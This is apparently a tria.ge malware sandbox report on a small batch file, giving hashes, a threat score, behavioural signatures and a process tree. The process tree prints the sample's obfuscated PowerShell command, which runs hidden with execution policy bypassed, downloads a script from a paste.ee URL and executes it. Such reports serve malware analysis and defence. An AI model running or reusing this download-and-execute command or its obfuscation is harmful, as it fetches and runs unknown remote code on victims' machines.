Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
01/03/2025, 15:04
Static task
static1
Behavioral task
behavioral1
Sample
a.bat
Resource
win7-20241010-en
4 signatures
150 seconds
General
-
Target
a.bat
-
Size
156B
-
MD5
a4b2a54bebc39707a69977648a7a2b4f
-
SHA1
c27b1203244796cc064b00c472cec23cd16760ce
-
SHA256
5c14590059c2133806d881fa853b627b73748a20e529afaf4c7aa2a5fce97eb3
-
SHA512
669f71ff4b75184341eec4a1d78556b2e95ffecf8f14ac6a0467d8169e8bf5b991af443f5dd1786fbef244d483cebb10400374bed3a11ada805040c4f4eb32c1
Score
6/10
Malware Config
Signatures
-
pid Process 3056 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3056 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3056 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2708 wrote to memory of 3056 2708 cmd.exe 31 PID 2708 wrote to memory of 3056 2708 cmd.exe 31 PID 2708 wrote to memory of 3056 2708 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\a.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -w h -ExecutionPolicy Bypass -Command "(I'w'r('https://paste.ee/r/CLsmPBQU/0') -useB) | .('{1}{$}'.replace('$','0')-f'!','I').replace('!','ex');"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3056
-